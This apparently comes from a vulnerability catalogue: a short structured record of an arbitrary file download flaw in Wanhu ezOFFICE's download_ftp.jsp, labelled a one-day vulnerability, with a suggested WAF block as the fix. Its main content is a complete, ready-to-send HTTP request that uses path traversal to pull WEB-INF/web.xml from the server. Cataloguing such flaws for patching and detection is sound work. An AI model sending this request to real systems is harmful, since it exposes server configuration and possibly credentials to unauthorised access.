vendor = "万户"
name = "万户 ezOFFICE download_ftp.jsp 任意文件下载漏洞"
type = "任意文件下载"
version = "未知"
path = "/defaultroot/download_ftp.jsp"
detail = "GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web. xml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
